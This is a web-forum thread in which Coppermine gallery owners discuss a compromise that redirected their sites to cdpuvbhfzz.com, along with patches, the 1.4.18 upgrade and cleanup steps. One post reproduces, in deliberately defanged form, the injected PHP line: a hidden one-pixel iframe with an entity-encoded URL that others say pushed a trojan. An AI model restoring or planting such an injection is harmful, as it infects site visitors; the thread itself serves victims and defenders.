Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

[slausen]

Deleting bridge/coppermine.inc.php doesn't make sense.

If you are not bridged you will bring down your gallery.
If you are bridged then you are not vulnerable there to begin with.

Deleting update.php is reasonable, deleting upload.php is reasonable if you don't use http/uri uploads.

Thanks for that info Nibbler. Very helpful.

What versions of cpg is the version of 'bridge/coppermine.inc.php' that you referenced in your link compatible with?

Or alternatively, since I am not using bridging, is there a way to turn it off completely, and delete the entire bridge folder?

[mickyd]

My site has been hacked and I have been watching this thread in the hope of finding a resolution.

I have no idea of the history behind Marians post.
But I support her sentiments regarding the attitude of moderators.
I appreciate any work done by volunteers.
I happen to run my Coppermine site for Mature Coppermine users.
I spend a great deal of my time (for free) explaining to less knowledgable users the intracicies of using the software.
I get asked the same (some might think stupid) questions again and again.
But I would never even think of talking to them the way moderators talk on this support forum.
Not just on this 'stressed' thread but normally.
The power seems to have infected them.

A scared to post (up until now) coppermine user..

[pspmichael]

Joachim,

I hope this information is helpful to you.  If not, maybe it will be to someone else.

On my site I was running the previous version of Coppermine.  When I went to cPanel to see what it showed, it had a warning that I needed to upgrade my Coppermine, I was down by 1 upgrade.  Since I wasn't sure whether that would help or not, I held off. 

Long story short, none of my Coppermine files were touched.  However every php and html file for my WebCalender were infected with the iframe statement.  Since my calendar is easily rebuilt, I simply removed it from my site, did the upgrade to Coppermine and then reinstalled the calender.  I haven't had a problem since. 

Now that I was up and running again, I thought I would check out what exactly happened.  The files that were infected simply had an added line, an iframe statement to the bottom of each file.  It was easy enough to go through and edit the 200 plus files, just tedious.  I'm not sure how to safely put this in here, so I removed the command brackets, some spaces, backslashes and put a period between each number.  That might be over kill but I would rather overkill than risk it happening here.  The line I had in my files was an iframe command, something I'm not at all familiar with.  This is the line without the items I mentioned and with all the periods I mentioned:
php/echo 'iframesrc="&#1.0.4;&#1.1.6;&#1.1.6;&#1.1.2;&#5.8;&#4.7;&#4.7;&#9.9;&#1.0.0;&#1.1.2;&#1.1.7;&#1.1.8;&#9.8;&#1.0.4;&#1.0.2;&#1.2.2;&#1.2.2;&#4.6;&#9.9;&#1.1.1;&#1.0.9;&#4.7;&#1.0.0;&#1.0.8;&#4.7;&#9.7;&#1.0.0;&#1.1.8;&#5.3;&#5.7;&#5.6;&#4.6;&#1.1.2;&#1.0.4;&#1.1.2;" width=1 height=1   iframe>';

Michael
I hope this helps someone else to get out of the problem this brought on.  And I hope some how the person who did this is repaid 10 fold for what he did. 

[Nibbler]

Or alternatively, since I am not using bridging, is there a way to turn it off completely, and delete the entire bridge folder?

If you're not using bridging then you are not vulnerable. That file is not used when bridged. You can't delete the bridge folder since standalone Coppermine is just another type of bridge as far as the code is concerned.

[mr.goose]

If you're not using bridging then you are not vulnerable. That file is not used when bridged. You can't delete the bridge folder since standalone Coppermine is just another type of bridge as far as the code is concerned.

Sorry Nibbler. I read and re-read this many times. It just doesn't make sense to me. OK. If I am not using bridging then I am not vulnerable. But if Coppermine is just another type of bridge as far as the code is concerned and I am using Coppermine then ipso facto I am using bridging. Therefore I am vulnerable. Aren't I?

Also, has the Dev Team figured out how the bad guys are changing the cpg_config database table in the first place? That part really scares me.Best wishes, G

[Nibbler]

OK, maybe that wasn't as clear as it could have been. All galleries use udb_base.inc.php plus the bridge file for that app. If you use standalone Coppermine that means udb_base.inc.php + coppermine.inc.php. If you use phpbb then it's udb_base.inc.php + phpbbxxx.inc.php. If you didn't go through the bridge manager then you use the 'coppermine' bridge. It's confusing but a good idea as far as the code goes (polymorphism). So if you bridge to some forum or CMS you don't use coppermine.inc.php atall.

The exploit allows the attacker to gain admin privileges, so anything goes.

[gertiebeth]

The release will be whenever GauGau finds time to put it together, it takes quite some time and effort.

Until then, you can replace your copy of bridge/coppermine.inc.php with the fixed copy in svn, here.

This copy of /bridge/coppermine.inc.php breaks all of my stand alone and modded by stramm versions of CPG 1.4.17. The errors I receive are:

For displayimage.php:

Code:

There was an error while processing a database query

And when loggin in as admin, the entire gallery goes down with the error:

Code:

Fatal Error:

[Nibbler]

I expect Stramm will provide an updated version once 1.4.18 is released.

[gertiebeth]

I expect Stramm will provide an updated version once 1.4.18 is released.

The errors are present on my none modded, stand alone galleries as well. Has anyone been successful is using this new 1.4.18 /bridge/coppermine.inc.php file?

[slausen]

OK, maybe that wasn't as clear as it could have been. All galleries use udb_base.inc.php plus the bridge file for that app. If you use standalone Coppermine that means udb_base.inc.php + coppermine.inc.php. If you use phpbb then it's udb_base.inc.php + phpbbxxx.inc.php. If you didn't go through the bridge manager then you use the 'coppermine' bridge. It's confusing but a good idea as far as the code goes (polymorphism). So if you bridge to some forum or CMS you don't use coppermine.inc.php atall.

The exploit allows the attacker to gain admin privileges, so anything goes.

Hi Nibbler-

Thanks for providing us with this info, but I am still unclear - so if I am not bridging to another app, and am running coppermine standalone, then I AM vulnerable?

Given that several people have posted that they have had problems with the new coppermine.inc.php file, what is the recommended procedure to protect myself? Which version(s) of coppermine are compatible with the new file? If I've removed upload.php and update.php from the server, do I still need to take action on coppermine.inc.php or am I protected since they won't be able to do the SQL injection using the upload.php file?

Thanks.

[volksfahrer.nl]

Is it wise to wait for version .18 so I won't have to install all kinds op patches?
And can you give me an idea of how long it's gonna take untill .18 is done?
I know it's been worked on but are we talking days, weeks or months?

Thank you.

[Nibbler]

Today.

[bugmenot]

My site was also hacked by this cdpuvbhfzz.com site. If I visited a hacked page am I (or my visitors) at risk of being infected with a virus? Does anyone know exactly what that iframe does? Thanks all.

[Hercules24]

I was using IE 6, and I didn't get any virus warings, only IE crashed when visiting the infected gallery.
Other people claimed that the redirect to the dirty site tried to install a trojan, so better clean up the mess asap and update to 1.4.18 now!

[davec]

I was hacked and the easiest way I found to deal with it was as follows.

Firstly upgrade to the latest version if you have not done so as per normal instructions. I then checked all files and folders and found the ones where the date was different. I was hacked on 9th April it seems. I found the files changed on that date etc and any that did not match the newly downloaded files were either removed or the offending code deleted. Check your anycontent.php - includes/config.inc.php and also your album folders also.

I then checked the files and folders online against a local copy so make sure there were no mystery additions. Seems to have done the trick.

Hope it helps some of you?

[davec]

My site was also hacked by this cdpuvbhfzz.com site. If I visited a hacked page am I (or my visitors) at risk of being infected with a virus? Does anyone know exactly what that iframe does? Thanks all.

Well on my PC my Anti Virus picked up that it was trying to install a trojan on to the computer. This was only apparent when I tried opening the site in IE7. I only did that after odd text appeared on the page when displayed in FF.

[Llama8668]

The temp build of the coppermine.inc file work okay for me (I just overwrote the 4.1.7 file and it's not displayed any errors that I've seen). I have seen some Fatal Error: messages, however this tends to be my host playing up. So far all I've done is upgrade to 4.1.7 attempted to remove all traces of the .Zip/.Jpg exploit files and tried inserting PHP.ini files to turn of register_globals.

In terms of the effects on browsers. Firefox and IE6 appear to handle infected pages okay (to the extent that they may not even show that they're making calls to the  cdpuvbhfzz domain). IE 7 seems to crash when infected pages are encountered though this may be influenced by the type of anti virus software installed (McAfee appears to warn when infected pages are visited).

[Joachim Müller]

There is no such thing as coppermine v4.1.7. More accuracy please.

tried inserting PHP.ini files to turn of register_globals.

Ask your webhost to turn that silly and dangerous setting off server-wide.

As Nibbler suggested: cpg1.4.18 has been relased today. Everybody calm down and upgrade.

[Cel]

Have removed/overwritten everything which changed on the 9th (when my site was hit) including the 'JPG' file. Installed 1.4.18 (thanks guys for coming up with this so quickly - much appreciated). Set the config back to what it should be, and hopefully restored the gallery to normal working minus whatever the vulnerability was. The only remaining niggle is that I keep seeing messages here saying, 'it's not sufficient to update, you have to santitize the site'. But when I search for instructions as to how to do so, I draw a blank. If it involves something other than the above, a link would be welcome. Thanks again.

[capecodgal]

UGHHHHHH!!!! Ok this nightmare is continuing - last week someone hacked into a bunch of sites at one of my hosts- the issues w/ the config being all messed up or the re-directing via the uploaded file; she restored everybody's sites and we all upgraded to the .16 then the .17 releases and all is ok... for the time being and I leave for Boston for the weekend hoping all is well;

Now I get back from the funeral and my co-web on another set of sites tells me after what happened on the first host she upgraded ALL of our sites on our purchased hosting (seperate servers) to the .17 release to be sure nothing happened to them; then today each and every one of them was hacked into!!!! Then she e-mails me stating that a .18 version was released and it has some major security issues so she doesn't want to load that but the .17 release apparently must have had the same issues or similiar as each and every site we have running that version is now hacked and pointing to this stupid cdpuv website; this is such a mess to clean up and of course the paid hosting doesn't have auto backups so we are totally S.O.L!! Luckily these sites were just getting launched so to start over is not going to kill us and she is talking to the host to see what they can do.

I am posting this for 2 reasons.....
#1 apparently this attack got into our CPANEL and effected each site hosted on that account (even toasted our wordpress blogs) so any of you being hacked watch out and restore asap before other sites on your servers are effected and you lose everything
#2 I have been reading through the posts to see what resolution will be or if it has been figured out yet where the issue is and when it will be fixed but everything seems so sporatic as some people have this mod or that mod, etc it seems the issue is in CPG to me as that is really what we all have in common and as far as the URI uploads (uploading via a URL) my first host indicated those have been disabled on her servers for years now so she didn't think that was how the attacks were happening. What else can we do to prevent this from happening again; anyone had any luck taking the gallery offline for the time being or removing the links on our sites to the gallery or are they just doing a general search for "powered by coppermine" or something like that. Basically I want to do whatever I can to hide my galleries for the next few days/ weeks even if they need to go offline.

Thanks for ANY direction any of you can give -